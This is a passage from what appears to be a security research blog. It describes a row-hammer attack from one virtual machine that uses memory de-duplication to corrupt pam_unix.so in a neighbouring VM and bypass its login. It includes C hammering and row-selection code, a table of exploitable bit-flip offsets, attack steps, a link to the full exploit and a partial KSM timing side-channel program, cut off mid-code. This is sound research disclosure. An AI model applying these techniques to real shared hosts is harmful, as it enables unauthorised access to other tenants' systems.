here</a></p>A new patch has been recently shipped in FreeBSD kernels to fix a vulnerability (cve-2019-5602) present in the cdrom device. In this post, we will introduce the bug and discuss its exploitation on pre/post-SMEP FreeBSD revisions.Attacking a co-hosted VM: A hacker, a hammer and two memory modules2017-10-04T08:52:43+00:002017-10-04T08:52:43+00:00/exploit,/row-hammer,/memory/de-duplication/2017/10/04/attacking-a-co-hosted-vm<p>Row-hammer is hardware bug that can cause bit-flips in physical RAM. <a href="https://googleprojectzero.blogspot.fr/2015/03/exploiting-dram-rowhammer-bug-to-gain.html">Mark
Seaborn and Thomas Dullien</a> were the first to exploit the DRAM row-hammer
bug to gain kernel privileges. <a href="https://www.usenix.org/system/files/conference/usenixsecurity16/sec16_paper_razavi.pdf">Kaveh Razavi et al.</a> pushed the
exploitation of row-hammer bugs to the next level. They abused an OS feature -
memory de-duplication - to surgically flip bits in a controlled way. They
succeeded in flipping bits in memory loaded sensitive files (e.g.
authorized_keys) assuming they know their contents. By weakening RSA moduli in
authorized_keys file, they were able to generate corresponding private keys and
authenticate on a co-hosted victim VM.</p>
<p>In this post, we aim to showcase a different attack scenario. Instead of
corrupting memory loaded files, we chose to corrupt the state of a running
program. The libpam is an attractive target since it provides authentication
mechanisms on widely deployed <code class="language-plaintext highlighter-rouge">*nix</code> systems.</p>
<p>By running an instance of a row-hammer attack on an attacker VM, we were able
to successfully authenticate on an adjacent victim VM by corrupting the state
of <code class="language-plaintext highlighter-rouge">pam_unix.so</code> module.</p>
<p>In the following, we assume two adjacent VMs running Linux (attacker VM + victim
VM) and hosted on a KVM hypervisor:</p>
<p><img src="/images/hammer/vm.png" alt="" width="430px" class="center" />
<em>Figure 1 – Attacker Model</em></p>
<h2 id="row-hammer">Row-hammer</h2>
<p>A DRAM chip consists of rows of cells that are periodically refreshed. When the
CPU requests a read/write operation on a byte of memory, the data is first
transferred to the row-buffer (<strong>discharging</strong>). After performing the requested
operation, the content of the row-buffer is copied back to the original row
(<strong>recharging</strong>). Frequent row activation (discharging and recharging) can
cause disturbance errors that are reflected by a higher discharge rate on
adjacent row’s cells. This induces bit-flips in adjacent memory rows
(<strong>victim</strong> rows) if they are not refreshed before they lose their charge.</p>
<p>The following code is sufficient to produce bit-flips. The code alternates the
reading from two different memory rows (<strong>aggressor</strong> rows). This is required,
otherwise we will always be served from the row-buffer and won’t be able to
activate a row repeatedly. The <code class="language-plaintext highlighter-rouge">clflush</code> instruction is also required to avoid
being served from the CPU’s cache.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">volatile</span> <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">a</span> <span class="o">=</span> <span class="p">(</span><span class="k">volatile</span> <span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="n">aggressors</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="k">volatile</span> <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">b</span> <span class="o">=</span> <span class="p">(</span><span class="k">volatile</span> <span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="n">aggressors</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span>
<span class="kt">int</span> <span class="n">nb_reads</span> <span class="o">=</span> <span class="n">READ_REPZ</span><span class="p">;</span>
<span class="k">while</span> <span class="p">(</span><span class="n">nb_reads</span><span class="o">--</span> <span class="o">></span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
<span class="o">*</span><span class="n">a</span><span class="p">;</span>
<span class="o">*</span><span class="n">b</span><span class="p">;</span>
<span class="n">asm</span> <span class="k">volatile</span> <span class="p">(</span>
<span class="s">"clflush (%0)</span><span class="se">\n\t</span><span class="s">"</span>
<span class="s">"clflush (%1)</span><span class="se">\n\t</span><span class="s">"</span>
<span class="o">:</span>
<span class="o">:</span> <span class="s">"r"</span> <span class="p">(</span><span class="n">a</span><span class="p">),</span> <span class="s">"r"</span> <span class="p">(</span><span class="n">b</span><span class="p">)</span>
<span class="o">:</span> <span class="s">"memory"</span>
<span class="p">);</span></code></pre></figure>
<p>Mark Seaborn and Thomas Dullien have noticed that the row-hammer effect is
amplified on the victim row <code class="language-plaintext highlighter-rouge">k</code> if we “aggress” its neighbors (row <code class="language-plaintext highlighter-rouge">k-1</code>
and row <code class="language-plaintext highlighter-rouge">k+1</code>).</p>
<p><img src="/images/hammer/bit-flip.png" alt="" />
<em>Figure 2 – Double-sided Row-Hammer</em></p>
<h3 id="channels-ranks-banks-and-address-mapping">Channels, ranks, banks and address mapping</h3>
<p>In a dual channel configuration, one can plug up to two memory modules. A
memory module consists of memory chips that could be present in both side of
the memory module. Each side is called <strong>rank</strong>. A memory chip is organized in
<strong>banks</strong> and a bank is a matrix (<strong>columns</strong> X <strong>rows</strong>) of memory cells.</p>
<p>My PC is equipped with 8 GB RAM with the following setting:</p>
<ul>
<li>2 channels.</li>
<li>1 memory module per channel.</li>
<li>2 ranks per memory module.</li>
<li>8 memory chips per rank.</li>
<li>8 banks per chip.</li>
<li>2^15 rows x 2^10 columns x 8 bits per bank.</li>
</ul>
<p>The available RAM size is computed as follows:</p>
<blockquote>
<p>2 modules * 2 ranks * 2^3 chips * 2^3 banks * 2^15 rows * 2^10 columns * 1 byte = 8 GB</p>
</blockquote>
<p>When the CPU accesses one byte of memory, the memory controller is in charge of
fulfilling the request. The physical address allows actually to select the
channel, the memory module, the rank, the bank, the row and the column.</p>
<p>Mark Seaborn has determined the <a href="mapping">physical address
mapping</a> for Intel Sandy Bridge CPUs. This mapping matches with the memory configuration
given below:</p>
<ul>
<li>Bit 0-5: lower 6 bits of byte index within a row.</li>
<li>Bit 6: channel selection.</li>
<li>Bit 7-13: higher 7 bits of byte index within a row.</li>
<li>Bit 14-16: bank selection obtained by: <code class="language-plaintext highlighter-rouge">((addr >> 14) & 7) ^ ((addr >> 18) & 7)</code></li>
<li>Bit 17: rank selection.</li>
<li>Bit 18-33: row selection.</li>
</ul>
<p>As noted in the <a href="https://depletionmode.com/2015/12/08/whats-in-an-address-ddr-memory-mapping/">following post</a>, the memory controller does not
address the chip and returns 8 bytes even if the CPU requests a single byte.
The CPU uses the 3 LSB bits of the address to select the right bits.</p>
<p>In the rest of this post, we will assume the physical mapping presented above.</p>
<h3 id="row-selection">Row selection</h3>
<p>Row-hammering requires to select aggressor rows that belong to the same bank.
Assuming, we know the underlying physical address mapping, how one can pick up
a pair of addresses that map to the same bank but different rows?</p>
<p>The fact that we are attacking from a VM limits the available options. We
cannot navigate through rows if we can’t convert a virtual address into a
physical address. Indeed, in our case, physical addresses from the VM point of
view are simply offsets in QEMU’s virtual address space. There is only one
option left: Transparent Huge Pages (THP).</p>
<p><a href="https://www.kernel.org/doc/Documentation/vm/transhuge.txt">THP</a> is a Linux feature where a kernel thread running in the background
attempts to allocate huge pages of 2 MB. If we allocate a large buffer aligned
on 2 MB boundary, then the kernel thread in the guest will try to back the
buffer by huge pages. The same goes for QEMU’s virtual memory in the host
that will be backed too by huge pages after some amount of time. Thanks to THP,
we can get 2 MB of contiguous physical memory, and since a huge page covers
several rows, we can navigate through rows.</p>
<p>According to the previously presented physical address mapping, the row is
addressed with the MSB bits (bits 18-33). This means that a huge page covers
multiple rows: 8 exactly (2 * 2^20 / 2^18). Note, however, that addresses in a
given row belong to different channels, banks and ranks.</p>
<h3 id="row-hammering-from-a-vm">Row-hammering from a VM</h3>
<p>In the attacker VM, we allocate a large buffer that covers the available
physical RAM. For each memory block of size 2 MB, we check if it is backed by a
huge page by reading the <code class="language-plaintext highlighter-rouge">pagemap</code> file. Then, for each pair of aggressor
rows (r, r + 2) in a huge page, we hammer each pair of addresses by varying the
channel bit and the rank bit. Note, however, that the xoring scheme in the
physical address mapping makes it a bit challenging to select pair of addresses
that belong to the same bank:</p>
<p>Let (r_i, b_i) denotes the 3 LSB bits identifying the row and the bank in an
address from row i, respectively. For a fixed channel and rank numbers, we
hammer each address from row i with the addresses satisfying the following
condition in row j (j = i + 2):</p>
<blockquote>
<p>r_i ^ b_i = r_j ^ b_j</p>
</blockquote>
<p>For a given bank b_i, only three banks out 8 possible banks b_j satisfy the
above condition.</p>
<p><img src="/images/hammer/address_selection.png" alt="" />
<em>Figure 3 – Row Selection</em></p>
<p>We optimize the code by row-hammering the four matching addresses in one go:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">static</span> <span class="kt">int</span>
<span class="nf">hammer_pages</span><span class="p">(</span><span class="k">struct</span> <span class="n">ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span> <span class="kt">uint8_t</span> <span class="o">*</span><span class="n">aggressor_row_prev</span><span class="p">,</span> <span class="kt">uint8_t</span> <span class="o">*</span><span class="n">victim_row</span><span class="p">,</span>
<span class="kt">uint8_t</span> <span class="o">*</span><span class="n">aggressor_row_next</span><span class="p">,</span> <span class="k">struct</span> <span class="n">result</span> <span class="o">*</span><span class="n">res</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uintptr_t</span> <span class="n">aggressor_row_1</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uintptr_t</span><span class="p">)(</span><span class="n">aggressor_row_prev</span><span class="p">);</span>
<span class="kt">uintptr_t</span> <span class="n">aggressor_row_2</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uintptr_t</span><span class="p">)(</span><span class="n">aggressor_row_next</span><span class="p">);</span>
<span class="kt">uintptr_t</span> <span class="n">aggressor_ch1</span><span class="p">,</span> <span class="n">aggressor_ch2</span> <span class="p">,</span> <span class="n">aggressor_rk1</span><span class="p">,</span> <span class="n">aggressor_rk2</span><span class="p">;</span>
<span class="kt">uintptr_t</span> <span class="n">aggressors</span><span class="p">[</span><span class="mi">4</span><span class="p">],</span> <span class="n">aggressor</span><span class="p">;</span>
<span class="kt">uint8_t</span> <span class="o">*</span><span class="n">victim</span><span class="p">;</span>
<span class="kt">uintptr_t</span> <span class="n">rank</span><span class="p">,</span> <span class="n">channel</span><span class="p">,</span> <span class="n">bank1</span><span class="p">,</span> <span class="n">bank2</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">i</span><span class="p">,</span> <span class="n">p</span><span class="p">,</span> <span class="n">offset</span><span class="p">,</span> <span class="n">ret</span> <span class="o">=</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="cm">/* Loop over every channel */</span>
<span class="k">for</span> <span class="p">(</span><span class="n">channel</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">channel</span> <span class="o"><</span> <span class="n">ctx</span><span class="o">-></span><span class="n">channels</span><span class="p">;</span> <span class="n">channel</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="n">aggressor_ch1</span> <span class="o">=</span> <span class="n">aggressor_row_1</span> <span class="o">|</span> <span class="p">(</span><span class="n">channel</span> <span class="o"><<</span> <span class="n">ctx</span><span class="o">-></span><span class="n">channel_bit</span><span class="p">);</span>
<span class="n">aggressor_ch2</span> <span class="o">=</span> <span class="n">aggressor_row_2</span> <span class="o">|</span> <span class="p">(</span><span class="n">channel</span> <span class="o"><<</span> <span class="n">ctx</span><span class="o">-></span><span class="n">channel_bit</span><span class="p">);</span>
<span class="cm">/* Loop over every rank */</span>
<span class="k">for</span> <span class="p">(</span><span class="n">rank</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">rank</span> <span class="o"><</span> <span class="n">ctx</span><span class="o">-></span><span class="n">ranks</span><span class="p">;</span> <span class="n">rank</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="n">aggressor_rk1</span> <span class="o">=</span> <span class="n">aggressor_ch1</span> <span class="o">|</span> <span class="p">(</span><span class="n">rank</span> <span class="o"><<</span> <span class="n">ctx</span><span class="o">-></span><span class="n">rank_bit</span><span class="p">);</span>
<span class="n">aggressor_rk2</span> <span class="o">=</span> <span class="n">aggressor_ch2</span> <span class="o">|</span> <span class="p">(</span><span class="n">rank</span> <span class="o"><<</span> <span class="n">ctx</span><span class="o">-></span><span class="n">rank_bit</span><span class="p">);</span>
<span class="cm">/* Loop over every bank */</span>
<span class="k">for</span> <span class="p">(</span><span class="n">bank1</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">bank1</span> <span class="o"><</span> <span class="n">ctx</span><span class="o">-></span><span class="n">banks</span><span class="p">;</span> <span class="n">bank1</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="n">aggressors</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="n">aggressor_rk1</span> <span class="o">|</span> <span class="p">(</span><span class="n">bank1</span> <span class="o"><<</span> <span class="n">ctx</span><span class="o">-></span><span class="n">bank_bit</span><span class="p">);</span>
<span class="n">i</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
<span class="cm">/* Looking for the 3 possible matching banks */</span>
<span class="k">for</span> <span class="p">(</span><span class="n">bank2</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">bank2</span> <span class="o"><</span> <span class="n">ctx</span><span class="o">-></span><span class="n">banks</span><span class="p">;</span> <span class="n">bank2</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="n">aggressor</span> <span class="o">=</span> <span class="n">aggressor_rk2</span> <span class="o">|</span> <span class="p">(</span><span class="n">bank2</span> <span class="o"><<</span> <span class="n">ctx</span><span class="o">-></span><span class="n">bank_bit</span><span class="p">);</span>
<span class="cm">/* Bank match only if 2 msb are not 0 */</span>
<span class="k">if</span> <span class="p">((((</span><span class="n">aggressors</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">^</span> <span class="n">aggressor</span><span class="p">)</span> <span class="o">>></span> <span class="p">(</span><span class="n">ctx</span><span class="o">-></span><span class="n">bank_bit</span> <span class="o">+</span> <span class="mi">1</span><span class="p">))</span> <span class="o">&</span> <span class="mi">3</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span>
<span class="n">aggressors</span><span class="p">[</span><span class="n">i</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="n">aggressor</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">i</span> <span class="o">==</span> <span class="mi">4</span><span class="p">)</span> <span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="cm">/* Ensure victim is all set to bdir */</span>
<span class="k">for</span> <span class="p">(</span><span class="n">p</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">p</span> <span class="o"><</span> <span class="n">NB_PAGES</span><span class="p">(</span><span class="n">ctx</span><span class="p">);</span> <span class="n">p</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="n">victim</span> <span class="o">=</span> <span class="n">victim_row</span> <span class="o">+</span> <span class="p">(</span><span class="n">ctx</span><span class="o">-></span><span class="n">page_size</span> <span class="o">*</span> <span class="n">p</span><span class="p">);</span>
<span class="n">memset</span><span class="p">(</span><span class="n">victim</span> <span class="o">+</span> <span class="n">RANDOM_SIZE</span><span class="p">,</span> <span class="n">ctx</span><span class="o">-></span><span class="n">bdir</span><span class="p">,</span> <span class="n">ctx</span><span class="o">-></span><span class="n">page_size</span> <span class="o">-</span> <span class="n">RANDOM_SIZE</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">hammer_byte</span><span class="p">(</span><span class="n">aggressors</span><span class="p">);</span>
<span class="k">for</span> <span class="p">(</span><span class="n">p</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">p</span> <span class="o"><</span> <span class="n">NB_PAGES</span><span class="p">(</span><span class="n">ctx</span><span class="p">);</span> <span class="n">p</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="n">victim</span> <span class="o">=</span> <span class="n">victim_row</span> <span class="o">+</span> <span class="p">(</span><span class="n">ctx</span><span class="o">-></span><span class="n">page_size</span> <span class="o">*</span> <span class="n">p</span><span class="p">);</span>
<span class="k">for</span> <span class="p">(</span><span class="n">offset</span> <span class="o">=</span> <span class="n">RANDOM_SIZE</span><span class="p">;</span> <span class="n">offset</span> <span class="o"><</span> <span class="n">ctx</span><span class="o">-></span><span class="n">page_size</span><span class="p">;</span> <span class="n">offset</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">victim</span><span class="p">[</span><span class="n">offset</span><span class="p">]</span> <span class="o">!=</span> <span class="n">ctx</span><span class="o">-></span><span class="n">bdir</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">ctx</span><span class="o">-></span><span class="n">bdir</span><span class="p">)</span>
<span class="n">victim</span><span class="p">[</span><span class="n">offset</span><span class="p">]</span> <span class="o">=</span> <span class="o">~</span><span class="n">victim</span><span class="p">[</span><span class="n">offset</span><span class="p">];</span>
<span class="n">ctx</span><span class="o">-></span><span class="n">flipmap</span><span class="p">[</span><span class="n">offset</span><span class="p">]</span> <span class="o">|=</span> <span class="n">victim</span><span class="p">[</span><span class="n">offset</span><span class="p">];</span>
<span class="n">ncurses_flip</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">offset</span><span class="p">);</span>
<span class="k">if</span> <span class="p">((</span><span class="n">ret</span> <span class="o">=</span> <span class="n">check_offset</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">offset</span><span class="p">,</span> <span class="n">victim</span><span class="p">[</span><span class="n">offset</span><span class="p">]))</span> <span class="o">!=</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
<span class="n">ncurses_fini</span><span class="p">(</span><span class="n">ctx</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"[+] Found target offset</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="n">res</span><span class="o">-></span><span class="n">victim</span> <span class="o">=</span> <span class="n">victim</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="mi">4</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
<span class="n">res</span><span class="o">-></span><span class="n">aggressors</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">aggressors</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
<span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>One last interesting thing about row-hammering is the fact that is
reproducible. Some memory cells are less well isolated than others. If we get a
bit-flip in a victim row, then there is a high probability to reproduce that
bit-flip by hammering again the neighbors rows.</p>
<p><img src="/images/hammer/hammer.png" alt="" />
<em>Figure 4 - Row-Hammering in progress</em></p>
<h2 id="memory-de-duplication">Memory de-duplication</h2>
<p>Now that we know how to hammer, how to produce surgically bit-flips in memory?
Well, we will rely on an OS feature: memory de-duplication.</p>
<p>Memory de-duplication is useful especially in virtual machine environment as it
reduces significantly the memory footprint. On Linux, memory de-duplication is
assured by <a href="https://www.kernel.org/doc/Documentation/vm/ksm.txt">KSM</a> (Kernel-Same Page). KSM scans periodically the memory and
merges anonymous pages - having the flag <em>MADV_MERGEABLE</em> (see madvise(2)) -
that share the same content.</p>
<p><img src="/images/hammer/ksm_before.png" alt="" width="290px" />
<img src="/images/hammer/ksm_after.png" alt="" width="290px" />
<em>Figure 5 – Before Merge (left) - After Merge (right)</em></p>
<p>Assuming we know the content of a file located in an adjacent VM, here are the
main steps to modify a random bit in the file by exploiting the row-hammer bug
and by abusing the memory de-duplication feature:</p>
<ol>
<li>Hammer the memory from attacker VM.</li>
<li>Load target file in memory page vulnerable to a bit-flip.</li>
<li>Load target file in the victim VM.</li>
<li>Wait for KSM to merge the two pages.</li>
<li>Hammer again.</li>
<li>The file in the victim VM should have been modified.</li>
</ol>
<p>As noted by Razavi et al. in their <a href="https://www.usenix.org/system/files/conference/usenixsecurity16/sec16_paper_razavi.pdf">paper</a>, THP and KSM could have
unexpected effect on row-hammering. THP merges normal 4 KB pages to form huge
pages (2 MB) whereas KSM merges pages with same content. This could lead to
situations where KSM breaks huge pages. To avoid this, we fill the top of each
4 KB pages with 8 random bytes.</p>
<h2 id="pwning-the-libpam">Pwning the Libpam</h2>
<p>Given a program P, how can we find all flippable bits in the program code that
can change the outcome of P? Finding those bit flips manually by reverse
engineering program P is tedious and time consuming.</p>
<p>We developed a
<a href="https://github.com/mtalbi/pwnpam/blob/master/flip-flop.py">PoC (flip-flop.py)</a>
with radare2 that leverages on timeless-debugging capabilities to catch those
bits automatically. More precisely, we flip each bit of some target functions,
run the desired functions, and check whether the flipped bit impacts the
expected result of the targeted function.</p>
<p>We ran the PoC on two functions of the <code class="language-plaintext highlighter-rouge">pam_unix.so</code> module
(23e650547c395da69a953f0b896fe0a8):</p>
<ul>
<li><strong>pam_sm_authenticate</strong> [0x3440]: performs the task of authenticating the user.</li>
<li><strong>_unix_blankpasswd</strong> [0x6130]: checks if the user does not have a blank password.</li>
</ul>
<p><img src="/images/hammer/binja.png" alt="" />
<em>Figure 6 – Disassembling Libpam</em></p>
<p><img src="/images/hammer/flip-flop.png" alt="" />
<em>Figure 7 - Searching bit-flips in Libpam</em></p>
<p>We found a total of 17 bit-flips that allowed us to authenticate with a blank
or a wrong password.</p>
<table>
<thead>
<tr>
<th style="text-align: left">Offset</th>
<th style="text-align: left">Bit</th>
<th style="text-align: left">Direction</th>
<th style="text-align: left">Original Instruction</th>
<th style="text-align: left">Patched Intruction</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align: left">0x34c6</td>
<td style="text-align: left">1</td>
<td style="text-align: left">0 –> 1</td>
<td style="text-align: left">test eax, eax</td>
<td style="text-align: left">xchg eax, eax</td>
</tr>
<tr>
<td style="text-align: left">0x34c8</td>
<td style="text-align: left">0</td>
<td style="text-align: left">0 –> 1</td>
<td style="text-align: left">je 0x3538</td>
<td style="text-align: left">jne 0x3538</td>
</tr>
<tr>
<td style="text-align: left">0x34c8</td>
<td style="text-align: left">2</td>
<td style="text-align: left">1 –> 0</td>
<td style="text-align: left"> </td>
<td style="text-align: left">jo 0x3538</td>
</tr>
<tr>
<td style="text-align: left">0x34c8</td>
<td style="text-align: left">3</td>
<td style="text-align: left">0 –> 1</td>
<td style="text-align: left"> </td>
<td style="text-align: left">jl 0x3538</td>
</tr>
<tr>
<td style="text-align: left">0x34c8</td>
<td style="text-align: left">6</td>
<td style="text-align: left">1 –> 0</td>
<td style="text-align: left"> </td>
<td style="text-align: left">xor al, 0x6e</td>
</tr>
<tr>
<td style="text-align: left">0x3520</td>
<td style="text-align: left">3</td>
<td style="text-align: left">1 –> 0</td>
<td style="text-align: left">mov eax, ebx</td>
<td style="text-align: left">mov eax, edx</td>
</tr>
<tr>
<td style="text-align: left">0x3520</td>
<td style="text-align: left">4</td>
<td style="text-align: left">1 –> 0</td>
<td style="text-align: left"> </td>
<td style="text-align: left">mov eax, ecx</td>
</tr>
<tr>
<td style="text-align: left">0x3520</td>
<td style="text-align: left">5</td>
<td style="text-align: left">0 –> 1</td>
<td style="text-align: left"> </td>
<td style="text-align: left">mov eax, edi</td>
</tr>
<tr>
<td style="text-align: left">0x36c0</td>
<td style="text-align: left">1</td>
<td style="text-align: left">0 –> 1</td>
<td style="text-align: left">mov ebx, eax</td>
<td style="text-align: left">mov eax, ebx</td>
</tr>
<tr>
<td style="text-align: left">0x36c1</td>
<td style="text-align: left">0</td>
<td style="text-align: left">1 –> 0</td>
<td style="text-align: left"> </td>
<td style="text-align: left">mov edx, eax</td>
</tr>
<tr>
<td style="text-align: left">0x36c1</td>
<td style="text-align: left">1</td>
<td style="text-align: left">1 –> 0</td>
<td style="text-align: left"> </td>
<td style="text-align: left">mov ecx, eax</td>
</tr>
<tr>
<td style="text-align: left">0x36c1</td>
<td style="text-align: left">2</td>
<td style="text-align: left">0 –> 1</td>
<td style="text-align: left"> </td>
<td style="text-align: left">mov edi, eax</td>
</tr>
<tr>
<td style="text-align: left">0x36c1</td>
<td style="text-align: left">3</td>
<td style="text-align: left">0 –> 1</td>
<td style="text-align: left"> </td>
<td style="text-align: left">mov ebx, ecx</td>
</tr>
<tr>
<td style="text-align: left">0x36c1</td>
<td style="text-align: left">4</td>
<td style="text-align: left">0 –> 1</td>
<td style="text-align: left"> </td>
<td style="text-align: left">mov ebx, edx</td>
</tr>
<tr>
<td style="text-align: left">0x6211</td>
<td style="text-align: left">3</td>
<td style="text-align: left">0 –> 1</td>
<td style="text-align: left">xor eax, eax</td>
<td style="text-align: left">xor eax, edx</td>
</tr>
<tr>
<td style="text-align: left">0x6211</td>
<td style="text-align: left">4</td>
<td style="text-align: left">0 –> 1</td>
<td style="text-align: left"> </td>
<td style="text-align: left">xor eax, ecx</td>
</tr>
<tr>
<td style="text-align: left">0x6211</td>
<td style="text-align: left">5</td>
<td style="text-align: left">0 –> 1</td>
<td style="text-align: left"> </td>
<td style="text-align: left">xor eax, esp</td>
</tr>
</tbody>
</table>
<p><em>Table 1 – Bit-flips in <code class="language-plaintext highlighter-rouge">pam_unix.so</code> module</em></p>
<p>Note that the script cannot recover from some crashes. More precisely, r2pipe
fails to restore back the session after some fatal crashes. Unfortunately,
r2pipe does not provide any mean to handle errors.</p>
<h2 id="putting-all-together">Putting all together</h2>
<p>Our goal is to run an instance of row-hammer attack on the <code class="language-plaintext highlighter-rouge">pam_unix.so</code>
module loaded in an adjacent VM. Here, we recap the main steps to bypass the
authentication mechanism in the victim VM:</p>
<ol>
<li>Allocate the available physical memory.</li>
<li>Add some entropy to memory pages to prevent KSM from breaking THP pages. We fill the top of every 4 KB page with 8 random bytes. The rest is filled with ‘\xff’ to check for bit-flips in the direction 1 –> 0 (or with ‘\0’ to check for bit-flips in the direction 0 –> 1).</li>
<li>We hammer each pair of aggressor rows in every huge page and check whether we have bit-flips in the victim row.</li>
<li>Load the pam_unix.so module in the victim page if the bit-flip matches one of the offset of Table 1.</li>
<li>Load the pam_unix.so module in the victim VM by attempting to log on.</li>
<li>Wait for KSM to merge the pages.</li>
<li>Hammer again the aggressor addressors that have produced the bit-flip in question.</li>
<li>At this point, the <code class="language-plaintext highlighter-rouge">pam_unix.so</code> in the victim VM has been altered in memory.</li>
<li>Enjoy.</li>
</ol>
<p>The full exploit (pwnpam.c) is available <a href="https://github.com/mtalbi/pwnpam/">here</a>.</p>
<p>Please note that exploit is not 100% reliable and will fail if we can’t find
usable bit-flips.</p>
<h2 id="demo">Demo</h2>
<div class="embed-container">
<iframe src="https://www.youtube.com/embed/fGPZRTRa9Ek" width="100%" height="400" frameborder="0" allowfullscreen="">
</iframe>
</div>
<h2 id="going-further">Going further</h2>
<p>The exploit is not fully automatic. At some point, we need to interact with the
exploit to initiate row-hammering the <code class="language-plaintext highlighter-rouge">pam_unix.so</code> module after ensuring
that the module has been loaded in the victim VM memory and its content has
been merged with the one loaded in the attacker VM.</p>
<p>The exploit can be improved by exploiting a side-channel timing attack in KSM
enabling us to detect whether two pages are shared or not. Writing to a
duplicated pages triggers a page fault which in turn initiates a Copy-On-Write
operation to unmerge the pages. We can observe a noticeable difference in time
between writing to a duplicated page and writing to an unshared page.</p>
<p>The following code
(<a href="https://github.com/mtalbi/pwnpam/blob/master/cain.c">cain.c</a>) is an
implementation of the algorithm described in <a href="https://www.usenix.org/system/files/conference/woot15/woot15-paper-barresi.pdf">this paper</a>. The program
allocates a buffer of N elements (4096 KB each), fills it with random data, and
then copies each even element of the first half of the buffer in its
corresponding index in the second half of the buffer.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <time.h>
#include <inttypes.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/types.h>
</span>
<span class="cp">#define PAGE_NB 256
</span>
<span class="cm">/* from https://github.com/felixwilhelm/mario_baslr */</span>
<span class="kt">uint64_t</span> <span class="nf">rdtsc</span><span class="p">()</span> <span class="p">{</span>
<span class="kt">uint32_t</span> <span class="n">high</span><span class="p">,</span> <span class="n">low</span><span class="p">;</span>
<span class="n">asm</span> <span class="k">volatile</span><span class="p">(</span><span class="s">".att_syntax</span><span class="se">\n\t</span><span class="s">"</span>
<span class="s">"RDTSCP</span><span class="se">\n\t</span><span class="s">"</span>
<span class="o">:</span> <span class="s">"=a"</span><span class="p">(</span><span class="n">low</span><span class="p">),</span> <span class="s">"=d"</span><span class="p">(</span><span class="n">high</span><span class="p">)</span><span class="o">::</span><span class="p">);</span>
<span class="k">return</span> <span class="p">((</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">high</span> <span class="o"><<</span> <span class="mi">32</span><span class="p">)</span> <span class="o">|</span> <span class="n">low</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="kt">void</span> <span class="o">*</span><span class="n">buffer</span><span class="p">,</span> <span class="o">*</span><span class="n">half</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">page_size</span> <span class="o">=</span> <span class="n">sysconf</span><span class="p">(</span><span class="n">_SC_PAGESIZE</span><span class="p">);</span>
<span class="kt">size_t</span> <span class="n">size</span> <span class="o">=</span> <span class="n">page_size</span> <span class="o">*</span> <span class="n">PAGE_NB</span><span class="p">;</span>
